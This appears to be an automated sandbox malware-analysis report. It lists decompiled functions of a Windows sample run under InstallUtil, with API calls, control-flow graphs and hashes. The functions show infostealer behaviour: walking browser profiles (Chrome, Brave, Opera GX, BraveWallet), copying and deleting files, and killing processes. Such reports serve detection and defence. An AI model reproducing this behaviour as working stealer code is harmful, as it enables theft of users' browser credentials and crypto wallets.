                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                  • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                  • API String ID: 956187361-332874205
                                                                                                                  • Opcode ID: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                  • Instruction ID: 9fc36efd77a6d1cd63b80ec75f09b897df8326cc2b47f4e5761c6ba69d6b93d4
                                                                                                                  • Opcode Fuzzy Hash: 0bc5adfbe4236ef78a4ad54126e2e77cc3e862c7c695f1d91d4ab824e5d186cb
                                                                                                                  • Instruction Fuzzy Hash: 5BC12AB2E0021AABCF21EF61DC45AEE777DAF08305F0144A6F609B3151D7399B858F55
                                                                                                                  Function 00409D1C Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1787 409d1c-409dd5 call 4104e7 call 4105c7 call 410609 call 41058d call 402920 * 2 call 4104e7 * 2 FindFirstFileA 1804 40a788-40a7d7 call 402920 * 3 call 401cde call 402920 * 3 call 41d016 1787->1804 1805 409ddb-409def StrCmpCA 1787->1805 1806 40a761-40a776 FindNextFileA 1805->1806 1807 409df5-409e09 StrCmpCA 1805->1807 1806->1805 1809 40a77c-40a782 FindClose 1806->1809 1807->1806 1811 409e0f-409e85 call 410549 call 4105c7 call 410609 * 2 call 41058d call 402920 * 3 1807->1811 1809->1804 1842 409e8b-409ea1 StrCmpCA 1811->1842 1843 409f8e-40a002 call 410609 * 4 call 41058d call 402920 * 3 1811->1843 1844 409ea3-409f13 call 410609 * 4 call 41058d call 402920 * 3 1842->1844 1845 409f18-409f8c call 410609 * 4 call 41058d call 402920 * 3 1842->1845 1894 40a008-40a01d call 402920 StrCmpCA 1843->1894 1844->1894 1845->1894 1897 40a023-40a037 StrCmpCA 1894->1897 1898 40a1ef-40a204 StrCmpCA 1894->1898 1897->1898 1899 40a03d-40a173 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA call 4104e7 call 410609 * 2 call 41058d call 402920 * 2 call 410519 call 407fac 1897->1899 1900 40a206-40a249 call 401cfd call 410519 * 3 call 40852e 1898->1900 1901 40a259-40a26e StrCmpCA 1898->1901 2085 40a175-40a1b3 call 401cfd call 410519 call 416e97 call 402920 1899->2085 2086 40a1b8-40a1ea DeleteFileA call 402920 * 3 1899->2086 1960 40a24e-40a254 1900->1960 1903 40a270-40a281 StrCmpCA 1901->1903 1904 40a2cf-40a2e9 call 410519 call 411d92 1901->1904 1908 40a6d0-40a6d7 1903->1908 1909 40a287-40a28b 1903->1909 1931 40a2eb-40a2ef 1904->1931 1932 40a34f-40a364 StrCmpCA 1904->1932 1912 40a731-40a75b call 402920 * 2 1908->1912 1913 40a6d9-40a726 call 401cfd call 410519 * 2 call 4104e7 call 409d1c 1908->1913 1909->1908 1915 40a291-40a2cd call 401cfd call 410519 * 2 1909->1915 1912->1806 1982 40a72b 1913->1982 1958 40a335-40a33f call 410519 call 40884c 1915->1958 1931->1908 1940 40a2f5-40a32f call 401cfd call 410519 call 4104e7 1931->1940 1936 40a546-40a55b StrCmpCA 1932->1936 1937 40a36a-40a426 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1932->1937 1936->1908 1944 40a561-40a61d call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 CopyFileA 1936->1944 2040 40a4b9-40a4c9 StrCmpCA 1937->2040 2041 40a42c-40a4b3 call 401cfd call 410519 * 3 call 408ddb call 401cfd call 410519 * 3 call 409549 1937->2041 1940->1958 2045 40a623-40a65d call 401cfd call 410519 * 3 call 409072 1944->2045 2046 40a6a4-40a6b6 DeleteFileA call 402920 1944->2046 1983 40a344-40a34a 1958->1983 1960->1908 1982->1912 1983->1908 2042 40a4cb-40a516 call 401cfd call 410519 * 3 call 409a0e 2040->2042 2043 40a51c-40a52e DeleteFileA call 402920 2040->2043 2041->2040 2042->2043 2058 40a533-40a541 2043->2058 2092 40a662-40a69e call 401cfd call 410519 * 3 call 4092a7 2045->2092 2054 40a6bb-40a6c2 2046->2054 2060 40a6c9-40a6cb call 402920 2054->2060 2058->2060 2060->1908 2085->2086 2086->1898 2092->2046
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                  • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,00437324,004367EE,?,?,?), ref: 00409DC6
                                                                                                                  • StrCmpCA.SHLWAPI(?,00437328), ref: 00409DE7
                                                                                                                  • StrCmpCA.SHLWAPI(?,0043732C), ref: 00409E01
                                                                                                                    • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                    • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                  • StrCmpCA.SHLWAPI(?,Opera GX,00437330,?,004367F3), ref: 00409E93
                                                                                                                  • StrCmpCA.SHLWAPI(?,Brave,00437350,00437354,00437330,?,004367F3), ref: 0040A015
                                                                                                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A02F
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0EF
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040A1BE
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A1FC
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A266
                                                                                                                  • StrCmpCA.SHLWAPI(0040CCE9), ref: 0040A279
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A35C
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A41C
                                                                                                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A4C1
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040A522
                                                                                                                    • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FD4
                                                                                                                    • Part of subcall function 00408DDB: lstrlenA.KERNEL32(?), ref: 00408FEF
                                                                                                                    • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 00409970
                                                                                                                    • Part of subcall function 00409549: lstrlenA.KERNEL32(?), ref: 0040998B
                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 0040A553
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A613
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0040A6AA
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040A76E
                                                                                                                  • FindClose.KERNEL32(?), ref: 0040A782
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                  • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                  • API String ID: 4173076446-1189830961
                                                                                                                  • Opcode ID: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                  • Instruction ID: a20a882fd3e2cf19c19de5c34085d4fd9f009afcaba82f6ce1c70ae1e393a276
                                                                                                                  • Opcode Fuzzy Hash: 43b74e41b735a2950eaa9b795aa936c0c6a742f674b596ee9e9d83e77bc5aa89
                                                                                                                  • Instruction Fuzzy Hash: 7D422A3194012D9BCF21FB65DD46BCD7775AF04308F4101AAB848B31A2DB79AED98F89
                                                                                                                  Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405memoryfilestringCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2124 40884c-408865 call 410795 2127 408867-40886c 2124->2127 2128 40886e-40887e call 410795 2124->2128 2129 408885-40888d call 410549 2127->2129 2133 408880 2128->2133 2134 40888f-40889f call 410795 2128->2134 2136 4088a5-408922 call 4104e7 call 411c4a call 410609 call 4105c7 call 410609 call 4105c7 call 41058d call 402920 * 5 2129->2136 2133->2129 2134->2136 2140 408d72-408d96 call 402920 * 3 call 401cde 2134->2140 2172 408939-408949 CopyFileA 2136->2172 2173 408924-408936 call 410519 call 4122b0 2172->2173 2174 40894b-408984 call 4104e7 call 410609 call 41058d call 402920 2172->2174 2173->2172 2187 408986-4089d7 call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d 2174->2187 2188 4089dc-408a5b call 410609 call 41058d call 402920 call 4105c7 call 41058d call 402920 call 410609 call 41058d call 402920 call 4105c7 call 410609 call 41058d call 402920 2174->2188 2221 408a60-408a79 call 402920 2187->2221 2188->2221 2230 408d4b-408d57 DeleteFileA call 402920 2221->2230 2231 408a7f-408a9a 2221->2231 2237 408d5c-408d6b call 402920 * 2 2230->2237 2239 408aa0-408ab6 GetProcessHeap RtlAllocateHeap 2231->2239 2240 408d37-408d4a 2231->2240 2248 408d6d call 402920 2237->2248 2242 408cda-408ce7 2239->2242 2240->2230 2250 408abb-408b9d call 4104e7 * 6 call 401cfd call 410519 call 40826d StrCmpCA 2242->2250 2251 408ced-408cf9 lstrlenA 2242->2251 2248->2140 2287 408ba3-408bb6 StrCmpCA 2250->2287 2288 408d97-408dd9 call 402920 * 8 2250->2288 2251->2240 2253 408cfb-408d27 call 401cfd lstrlenA call 410519 call 416e97 2251->2253 2264 408d2c-408d32 call 402920 2253->2264 2264->2240 2289 408bc0 2287->2289 2290 408bb8-408bbe 2287->2290 2288->2248 2292 408bc6-408bde call 410549 StrCmpCA 2289->2292 2290->2292 2299 408be0-408be6 2292->2299 2300 408be8 2292->2300 2302 408bee-408bf9 call 410549 2299->2302 2300->2302 2308 408c08-408cd5 lstrcatA * 14 call 402920 * 7 2302->2308 2309 408bfb-408c03 call 410549 2302->2309 2308->2242 2309->2308
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E
                                                                                                                  • CopyFileA.KERNEL32(?,?,00000001), ref: 00408941
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
                                                                                                                    • Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
                                                                                                                    • Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
                                                                                                                    • Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
                                                                                                                  • StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
                                                                                                                  • StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00408CF0
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00408D0B
                                                                                                                    • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                    • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00408D4E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                  • String ID: ERROR_RUN_EXTRACTOR
                                                                                                                  • API String ID: 2819533921-2709115261
                                                                                                                  • Opcode ID: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                  • Instruction ID: 65d458a2be874082b650ad6ccfc12f730853009eff9118d7dbcfdf0fd3eb137e
                                                                                                                  • Opcode Fuzzy Hash: 0b36c14b47e0fd9c7b7447fafa283bbeba69ea66fa84174adce9456e951a1997
                                                                                                                  • Instruction Fuzzy Hash: CAE14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98
                                                                                                                  Function 6C6335A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294stringtimeCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 2567 6c6335a0-6c6335be 2568 6c6335c4-6c6335ed InitializeCriticalSectionAndSpinCount getenv 2567->2568 2569 6c6338e9-6c6338fb call 6c66b320 2567->2569 2570 6c6335f3-6c6335f5 2568->2570 2571 6c6338fc-6c63390c strcmp 2568->2571 2574 6c6335f8-6c633614 QueryPerformanceFrequency 2570->2574 2571->2570 2573 6c633912-6c633922 strcmp 2571->2573 2576 6c633924-6c633932 2573->2576 2577 6c63398a-6c63398c 2573->2577 2578 6c63361a-6c63361c 2574->2578 2579 6c63374f-6c633756 2574->2579 2582 6c633622-6c63364a _strnicmp 2576->2582 2583 6c633938 2576->2583 2577->2574 2578->2582 2584 6c63393d 2578->2584 2580 6c63396e-6c633982 2579->2580 2581 6c63375c-6c633768 2579->2581 2580->2577 2585 6c63376a-6c6337a1 QueryPerformanceCounter EnterCriticalSection 2581->2585 2586 6c633650-6c63365e 2582->2586 2587 6c633944-6c633957 _strnicmp 2582->2587 2583->2579 2584->2587 2588 6c6337b3-6c6337eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 2585->2588 2589 6c6337a3-6c6337b1 2585->2589 2590 6c63395d-6c63395f 2586->2590 2591 6c633664-6c6336a9 GetSystemTimeAdjustment 2586->2591 2587->2586 2587->2590 2592 6c6337ed-6c6337fa 2588->2592 2593 6c6337fc-6c633839 LeaveCriticalSection 2588->2593 2589->2588 2594 6c633964 2591->2594 2595 6c6336af-6c633749 call 6c66c110 2591->2595 2592->2593 2596 6c633846-6c6338ac call 6c66c110 2593->2596 2597 6c63383b-6c633840 2593->2597 2594->2580 2595->2579 2602 6c6338b2-6c6338ca 2596->2602 2597->2585 2597->2596 2603 6c6338dd-6c6338e3 2602->2603 2604 6c6338cc-6c6338db 2602->2604 2603->2569 2604->2602 2604->2603
                                                                                                                  APIs
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C6BF688,00001000), ref: 6C6335D5
                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C6335E0
                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 6C6335FD
                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C63363F
                                                                                                                  • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C63369F
                                                                                                                  • __aulldiv.LIBCMT ref: 6C6336E4
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C633773
                                                                                                                  • EnterCriticalSection.KERNEL32(6C6BF688), ref: 6C63377E
                                                                                                                  • LeaveCriticalSection.KERNEL32(6C6BF688), ref: 6C6337BD
                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 6C6337C4
                                                                                                                  • EnterCriticalSection.KERNEL32(6C6BF688), ref: 6C6337CB
                                                                                                                  • LeaveCriticalSection.KERNEL32(6C6BF688), ref: 6C633801
                                                                                                                  • __aulldiv.LIBCMT ref: 6C633883
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C633902
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C633918
                                                                                                                  • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C63394C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492468765.000000006C631000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C630000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492448452.000000006C630000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492833314.000000006C6AD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492911108.000000006C6BE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2492934435.000000006C6C2000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c630000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                  • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                  • API String ID: 301339242-3790311718
                                                                                                                  • Opcode ID: f6f0c7e450ea9e8e745ab1906fede0997ff620cc8483bdbdbbc403b648ad2a43
                                                                                                                  • Instruction ID: abe4a13f4a6cecad22fc34432b1de187c243941eefd580eacf12b38e1c967f79
                                                                                                                  • Opcode Fuzzy Hash: f6f0c7e450ea9e8e745ab1906fede0997ff620cc8483bdbdbbc403b648ad2a43
                                                                                                                  • Instruction Fuzzy Hash: 44B1D879B083119FDB08DF2AC49561A77F5FB8A700F04993EE899D3760E77098118B8E
                                                                                                                  Function 00415FD1 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                  • String ID: %s\%s$%s\%s$%s\*
                                                                                                                  • API String ID: 2178766154-445461498
                                                                                                                  • Opcode ID: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                  • Instruction ID: e3980370ac94f341e4db787ecefa849356652b5b9a50b55dc8137c0c02bcad1e
                                                                                                                  • Opcode Fuzzy Hash: b86d1d5988e8a5b633457fbb9a5ee7423a29332bb6b218ad99de9aa99dd34375
                                                                                                                  • Instruction Fuzzy Hash: FC81277190022DABCF60EF61CC45ACD77B9FB08305F0194EAE549A3150EE39AA898F94
                                                                                                                  Function 00411807 Relevance: 33.4, APIs: 11, Strings: 8, Instructions: 143memorycomtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
                                                                                                                  • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
                                                                                                                  • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
                                                                                                                  • VariantInit.OLEAUT32(?), ref: 004118DB
                                                                                                                    • Part of subcall function 00411757: __EH_prolog3_catch.LIBCMT ref: 0041175E
                                                                                                                    • Part of subcall function 00411757: CoCreateInstance.OLE32(004331B0,00000000,00000001,0043AF60,?,00000018,00411901,?), ref: 00411781
                                                                                                                    • Part of subcall function 00411757: SysAllocString.OLEAUT32(?), ref: 0041178E
                                                                                                                    • Part of subcall function 00411757: _wtoi64.MSVCRT ref: 004117C1
                                                                                                                    • Part of subcall function 00411757: SysFreeString.OLEAUT32(?), ref: 004117DA
                                                                                                                    • Part of subcall function 00411757: SysFreeString.OLEAUT32(00000000), ref: 004117E1
                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0041190A
                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00411916
                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041191D
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0041195C
                                                                                                                  • wsprintfA.USER32 ref: 00411949
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
